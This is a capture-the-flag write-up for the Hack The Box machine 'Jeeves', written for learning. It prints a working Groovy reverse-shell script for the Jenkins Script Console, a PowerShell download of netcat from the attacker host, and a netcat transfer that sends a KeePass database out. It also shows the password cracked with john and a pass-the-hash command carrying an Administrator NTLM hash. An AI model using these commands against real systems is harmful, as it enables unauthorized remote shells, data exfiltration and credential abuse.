Jeeves – Hack The Box

Overall Summary

Jeeves is a Windows machine from Hack The box that can be exploited through Jenkins by running a groovy reverse shell. Privilege escalation requires finding a kdbx file and using john the ripper to get password to open it, the file contains some usernames and passwords but to gain administrative privileges we will need to use a technique called “Pass the hash”. Overall, the machine is easy but does require some research to understand to proceed.

Scanning and Enumeration

A full TCP nmap scan shows that four different ports open.

Browsing to the HTTP service on port 80 displays a page that it seems to be a search engine.

Typing anything in the search box only returns an error.

I also executed gobuster but couldn’t find anything there. The other HTTP service running on port 50000 was also displaying a page which didn’t seem to contain any interesting information.

Running gobuster against the HTTP service running on port 50000 did return an intersting directory.

Browsing to this directory displays a page for Jenkins 2.87 as described at the bottomo of the page.

Exploitation

To achieve RCE with Jenkins can be very simple as it has an option to execute scripts with the ” Script Console” feature, this feature can accessed by clicking “Manage Jenkins” and then “Script Console”, we will be presented with the following screen:

From this box we can execute Groovy scripts which would allow us to get a reverse shell. To get a reverse shell I’ll use an script from github that can be found here:

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

and change the addressing information to my IP and port number. This is the script I’ll be using:

String host="10.10.14.21"; int port=443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

I’ll then set up a netcat listner and run the script to get a reverse shell as jeeves\kohsuke.

Post-Exploitation

Privilege escalation requires a few steps, if we go to the documents folder of the user kohsuke we will see a file named CEH.kdbx.

Trying to view the contents of the file doesn’t return any readable information and then later found out that the type of file is basically used for a password manager in Windows and that I could open it using keepass on my Linux machine. I first had to download this file to my attacking machine and to accomplish this I furst uploaded nc.exe (netcat windows version) to the target machine using PowerShell and hosting the binary on my attacking machine using Python SimpleHTTPServer, this is the PowerShell command I used:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.21/nc.exe','nc.exe')"

Once the binary was downloaded in the target machine I made use of it to transfer the CEH.kdbx file. This is the command used on the attacking machine to receive the file:

nc -lnvp 4321 > CEH.kdbx

And this is the command I used on the target machine to send the file using the binary that I had uploaded:

nc.exe -nv 10.10.14.21 4321 < C:\Users\kohsuke\Documents\CEH.kdbx

Once I had downloaded the file on my attacking machine I then had to install keepass2 because apparently the version 2 is the one that introduced the kdbx format, I found about this by reading it in the following link:

https://fileinfo.com/extension/kdbx

We can simply install keepass2 by running the following commands in Kali Linux:

sudo apt-get update sudo apt-get install keepass2

Once the tool was installed I attempted to open the file but I noticed that a password was required.

Researching more about the file type and how I could get a password I came across keepass2john, a tool that will get a hash from the file which can then be used to brute force the password with John the ripper. The first thing I did was to use the tool and saved the output to a file named “tocrack”, this is the command I used:

keepass2john CEH.kdbx > tocrack

I then used john the ripper with the rockyou.txt file to brute force the password and was able to successfully get the password “moonshine1”.

I went back to the keepass2 tool and used the password I obtained and was able to successfully got access to the contents of the file which displays some usernames and passwords.

To get the password we would simply select the one we want, right click on it and then select copy password, this will copy the actual password as it was stored. The one I had luck using was using the Backup stuff password which end up being a hash instead of a password.

With this I can still try to use a technique called “Pass the hash” which will allow me to log in into the target machine using the hash. I’ll use a tool already install in Kali Linux named pth-winexe, this is the command I’ll use to try to get a cmd shell with the username Administrator.

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe

I was able to successfully log in and become the Administrator User.

The Trick About The Flag

The root flag for this machine is stored in the Desktop folder of the Administrator user like any other machine in Hack The Box but there was a last challenge here to read the root.txt flag as the file located in the Desktop folder is named “hm.txt” and it says to look deeper.

This is where I learned about “Alternate Data Streams” which is basically the ability of the NTFS file system to store different data stream, so to look at the hidden file we would have to issue the the following command:

dir /r

We can now see the root.txt file but we still need to read it to get the flag. To read the flag we can simply use the “more” command as I learned by reading this article:

http://www.flexhex.com/docs/articles/alternate-streams.phtml. This is the command that can be used to read the flag:

more < hm.txt:root.txt